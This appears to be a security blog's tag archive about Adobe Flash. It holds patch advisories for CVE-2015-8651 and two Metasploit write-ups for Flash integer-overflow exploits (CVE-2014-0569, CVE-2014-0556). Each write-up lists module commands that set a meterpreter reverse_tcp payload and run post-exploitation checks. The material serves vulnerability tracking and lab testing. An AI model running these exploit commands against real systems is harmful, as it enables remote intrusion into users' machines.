Tag Archives: Adobe

MSA-2755801 Microsoft Emergency Patch For Flash Player 0day

Vulnerability Management, , , , , , ,

Microsoft has release, December 29th 2015, an emergency patch, with the updated of one security advisory concerning Adobe Flash Player.

Microsoft Security Advisory 2755801

MSA-2755801,released during September 2012, has been updated. The security advisory is concerning updates for vulnerabilities in Adobe Flash Player in Internet Explorer 10, Internet Explorer 11 and Microsoft Edge. KB3132372 has been released for supported editions of for:

  • Internet Explorer 10 on Windows 8, Windows Server 2012, and Windows RT;
  • Internet Explorer 11 on Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, and Windows 10;
  • Microsoft Edge on Windows 10.

The update addresses the vulnerabilities and Adobe Flash Player 0day (CVE-2015-8651described in Adobe Security bulletin APSB16-01.

Application of KB3132372 could lead to limited application crashes on Windows 10.

CVE-2014-0569 Adobe Flash Player casi32 Integer Overflow

Exploits, Metasploit, , , , ,

Timeline :

Vulnerability discovered by bilou and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2014-09-10
Patched by the vendor via APSB14-22 the 2014–10-14
Vulnerability reported integrated into exploit kits the 2014-10-21
Metasploit PoC provided the 2015–04-10

PoC provided by :

bilou
juan vazquez

Reference(s) :

CVE-2014-0569
APSB14-22
ZDI-14-365

Affected version(s) :

Adobe Flash Player 15.0.0.167 and earlier versions

Tested on :

with Adobe Flash Player 15.0.0.167 and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the casi32 method, where an integer overflow occurs if a ByteArray of length 0 is setup as domainMemory for the current application domain. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 15.0.0.167.

Commands :

use exploit/windows/browser/adobe_flash_casi32_int_overflow
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

Emergency Patch APSB16-01 For Flash Player 0day CVE-2015-8651

Vulnerability Management, , , ,

Adobe has release, the December 28th 2015, an emergency patch for Adobe Flash Player dealing with 19 vulnerabilities. This security bulletin has a Critical severity rating.

APSB16-01 is concerning:

  • Adobe Flash Player Desktop Runtime 20.0.0.235 and earlier for Windows and Macintosh
  • Adobe Flash Player Extended Support Release 18.0.0.268 and earlier for Windows and Macintosh
  • Adobe Flash Player for Google Chrome 20.0.0.228 and earlier for Windows, Macintosh, Linux and ChromeOS
  • Adobe Flash Player for Microsoft Edge and Internet Explorer 11 20.0.0.228 and earlier for Windows 10
  • Adobe Flash Player for Internet Explorer 10 and 11 20.0.0.228 and earlier for Windows 8.0 and 8.1
  • Adobe Flash Player for Linux 11.2.202.554 and earlier for Linux
  • AIR Desktop Runtime 20.0.0.204 and earlier for Windows and Macintosh
  • AIR SDK 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR SDK & Compiler 20.0.0.204 and earlier for Windows, Macintosh, Android and iOS
  • AIR for Android 20.0.0.204 and earlier for Android

In particular, a vulnerability with CVE-2015-8651 identifier, that has been discovered by Kai Wang and Hunter Gao of Huawei’s, is reporting exploited in the wild in limited targeted attacks. No details have been provided on this vulnerability, but surely it is time to patch otherwise why did Adobe release an emergency patch during Christmas period, a coordinated disclosure for limited targeted attacks would have been sufficient and could have wait beginning of January.

CVE-2014-0556 Adobe Flash Player copyPixelsToByteArray Method Integer Overflow

Exploits, Metasploit, , , ,

Timeline :

Vulnerability discovered by Chris Evans of Project Zero team at Google in 2014-07
Patched by the vendor via APSB14-21 the 2014–09-09
First public PoC provide by hdarwin on Packet Storm the 2014-09-30
Vulnerability reported integrated into exploit kits the 2014-10-20
Metasploit PoC provided the 2015-04-15

PoC provided by :

Chris Evans
Nicolas Joly
hdarwin
juan vazquez

Reference(s) :

CVE-2014-0556
APSB14-21

Affected version(s) :

Adobe Flash Player 14.0.0.179 and earlier versions

Tested on :

with Adobe Flash Player 14.0.0.176 (flashplayer14_0r0_176_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145, and 14.0.0.125. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 14.0.0.179. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 14.0.0.179.

Commands :

use exploit/windows/browser/adobe_flash_copy_pixels_to_byte_array
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinf